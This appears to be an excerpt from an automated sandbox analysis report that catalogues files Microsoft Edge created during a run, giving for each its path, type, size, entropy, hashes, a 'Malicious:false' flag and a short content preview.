                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1712906084"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\99f8943e-3f49-4d5d-9dcb-2fb5515b16bd.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):45544
                                                                                                                                          Entropy (8bit):6.094454233426912
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:2DXzgWPsj/qlGJqIY8GB4DoZhFrhDO6vP6O9l18gfK5Pi1cGoup1Xl3jVzXr4CCW:2/Ps+wsI7yyoZg6HTchu3VlXr4CRo4
                                                                                                                                          MD5:C5B1C6194AA51153C51FF25A548384B6
                                                                                                                                          SHA1:FBC5EA5F300683BE3DE5F6785F80E6DFB80D5405
                                                                                                                                          SHA-256:4215D881853F0AF7D3FF3E0CA4A1A94DC769D83BF41448C8421268C555DD3458
                                                                                                                                          SHA-512:DD1226A577CE315AC6DDDA85859BD2C3F1DC24707256847B85233B97119C21CA9D5673D86D26EEF2A547DDB86EDC8DFD757D4C3CC5C47515DA8BCDD4BBB0091F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1712906084"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4194304
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                          SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                          SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                          SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4194304
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                          SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                          SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                          SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6618DF5E-1E8C.pma

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4194304
                                                                                                                                          Entropy (8bit):0.4474529056467586
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:mkJ2j5OGu1g2fAi0yZvUR+X7BJcPaaGz0H0WMo54Xg1HF8/hz:F2jd8Ai0yvURmNyPaXVWMoGaH6/h
                                                                                                                                          MD5:1A350D88F1EFC7DF8365D1DFB9A029E7
                                                                                                                                          SHA1:27AAE2CD1A6FD880770852002CEC71C9FB8A4778
                                                                                                                                          SHA-256:F199AA3A1B7B1E2A02C1A1670961F32F72CB989357B3D6291903D46A9D5E01FD
                                                                                                                                          SHA-512:C4B33F74E4F3F8DB1A2C4CE0926402B16C056C3265125074CC1E2C79CFA2ED220C1259F009BD140BAFE827316FC7278D72537442B1BA7E90C2E51117EEAAFF9A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...@..@...@.....C.].....@..................P...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".pfvcqh20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K.;.k..>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. ..

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):280
                                                                                                                                          Entropy (8bit):4.132041621771752
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                          MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                          SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                          SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                          SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3e7b6591-3df0-46f4-9d6f-9dfcfd42a428.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):10617
                                                                                                                                          Entropy (8bit):5.208515275203245
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stKkdps+szssZih+tv5nKRkbYM8vbV+FC8QA66WuFlaFIMYgPnYJ:stKQXszsfh+5EbGlQx6WglaTY1
                                                                                                                                          MD5:8E440C49E765B57C4E852CB0F7241853
                                                                                                                                          SHA1:B8BD068DBD627C57822CFA05FBDC0D99B248F797
                                                                                                                                          SHA-256:F46E2E928EF18540EAD375C382069CF35F9DD3DECD71995897D3D58E00DECE2E
                                                                                                                                          SHA-512:FA68552F34304E128E7A3651BC91779B22EA58796119AE0A0B3E59A0ACBDCA3511E682F928725D8694BAAC0542530C50DDD5100091506F8DAF2523458CEB6BA0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\43ee271d-bb22-4a99-9879-937e28026035.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\52e6548d-91d7-43b6-bbd3-2aff8277f897.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5d9f335f-8dc7-4b40-89f5-3403e05d8472.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):31402
                                                                                                                                          Entropy (8bit):5.555492553512144
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Ryh3dzgLLoL64ZWPGQfF18F1+UoAYDCx9Tuqh0VfUC9xbog/OVUrsmx9FrwCpCtD:Ryh3dk/W64ZWPGQfF1u1jaFrsk9ubtD
                                                                                                                                          MD5:441C9A7D4073A37259F408F990CBF2B1
                                                                                                                                          SHA1:CFC3AA5CB4F99D55AB309906915012CC9C68C2E5
                                                                                                                                          SHA-256:399AC46AA11FE0A028DE54E1422D9B2E227B35DEDFDB8FBC25384A9C7E99335A
                                                                                                                                          SHA-512:1D8D696C707FCCA3C172FA711704D5EE6BC6AFCFB92C80F4C2BBD42EE0A31BD30536AD37E055E58084675862860B5AC427A3BA7A32568B5753DC961E596D12E5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13357379679150389","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13357379679150389","location":5,"ma

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\73b823fe-fe94-4083-823a-0a818a8e10fb.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9349
                                                                                                                                          Entropy (8bit):5.103076493312194
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stGkdps+s5ssZihnkbYM88bV+FiA66WMwaFIMYgPnYJ:stGQXs5sfhebGix6WhaTY1
                                                                                                                                          MD5:B15446FB19370F8618D94B5DCAAB0D44
                                                                                                                                          SHA1:886C8332ECB1319C4C6E0E77A8635194E19E0360
                                                                                                                                          SHA-256:649EE59CF2A6F374F83350D6FFF82C4FAA945AB0B158EC739D7CB27F132A266F
                                                                                                                                          SHA-512:BD80941257196D12C8BC39A778E803DDDB1F32DC72B79012AB8D9BF8485581C704300C464D4A477F257CD7294C290A7A595C6B7E6B3C2642E57DF4772D1E2BE6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):33
                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):309
                                                                                                                                          Entropy (8bit):5.252207116787497
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C7gR1923oH+Tcwtp3hBtB2KLlIw+q2P923oH+Tcwtp3hBWsIFUv:C79Yebp3dFLaw+v4Yebp3eFUv
                                                                                                                                          MD5:DFFE479F3F6835B99954079AA5B93182
                                                                                                                                          SHA1:893AEAD8C6B9A37C608AB315C107A95DDE3AC763
                                                                                                                                          SHA-256:229CDEAE987A637471AE9521E577022D188D9E8D448080A005B5CBEAF965426B
                                                                                                                                          SHA-512:F5B898E00B4AE31D90272FBFCEE66EC71411940F1C0EE6B91F0009B27AD11DDF49785A3735D351CF49B9D16143A921A0D026B3A1F7C391AA35A1996813C1B219
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:43.635 233c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/04/12-09:14:43.648 233c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41
                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):481241
                                                                                                                                          Entropy (8bit):5.396032643592198
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:v+477TZyhJOGiMlbOFbXG/KFd2X13p8S15tndAYDI11csxS:v+4zZoOG1eLG/KKp8cdAYDI11csE
                                                                                                                                          MD5:8316B5230C0598E09CAC80A1E1590B4B
                                                                                                                                          SHA1:F4B7DA4D2EF3C65D5C48D67646F363EA6028787E
                                                                                                                                          SHA-256:E626A60B1EC5DC290F2107AE4A62C3C86E23F2D063363E8D0D8FEF581B54C20F
                                                                                                                                          SHA-512:391B5C9A75C721FE3FECB1DC1EAC8F03CB9D2F467FD2661FAA303B9C48A846045477DA4C9661CFBB5D9831DB4202F81C6D6883A9AA7B60E7F195DF49641CAEBD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):336
                                                                                                                                          Entropy (8bit):5.109468689513746
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CFq2P923oH+Tcwt9Eh1tIFUt8NtZmw+N77kwO923oH+Tcwt9Eh15LJ:CFv4Yeb9Eh16FUt8Nt/+N775LYeb9Ehx
                                                                                                                                          MD5:32C26B3F0148B358C5F3D6F7FF879899
                                                                                                                                          SHA1:92564C0D53EDF1C25E7784410DF8B2F61190FCC0
                                                                                                                                          SHA-256:2A37C0A4740D8CE502F7DBEA8462BAAB30905398201E557DF56EE706007DB7C7
                                                                                                                                          SHA-512:B7B271ED6D98878E4D289E65DE6BF1EF5DC0CC8E97C2D4E9019DA827A46B159760EBA67112176A2BB3DBAECAEFF9BFF6EBDD315AB5DDFE99CFDB2C898B1E8EE1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:43.818 2060 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/04/12-09:14:43.826 2060 Recovering log #3.2024/04/12-09:14:43.839 2060 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):336
                                                                                                                                          Entropy (8bit):5.109468689513746
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CFq2P923oH+Tcwt9Eh1tIFUt8NtZmw+N77kwO923oH+Tcwt9Eh15LJ:CFv4Yeb9Eh16FUt8Nt/+N775LYeb9Ehx
                                                                                                                                          MD5:32C26B3F0148B358C5F3D6F7FF879899
                                                                                                                                          SHA1:92564C0D53EDF1C25E7784410DF8B2F61190FCC0
                                                                                                                                          SHA-256:2A37C0A4740D8CE502F7DBEA8462BAAB30905398201E557DF56EE706007DB7C7
                                                                                                                                          SHA-512:B7B271ED6D98878E4D289E65DE6BF1EF5DC0CC8E97C2D4E9019DA827A46B159760EBA67112176A2BB3DBAECAEFF9BFF6EBDD315AB5DDFE99CFDB2C898B1E8EE1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:43.818 2060 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/04/12-09:14:43.826 2060 Recovering log #3.2024/04/12-09:14:43.839 2060 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):28672
                                                                                                                                          Entropy (8bit):0.45442462208992396
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfB/fbw:TouQq3qh7z3bY2LNW9WMcUvBb
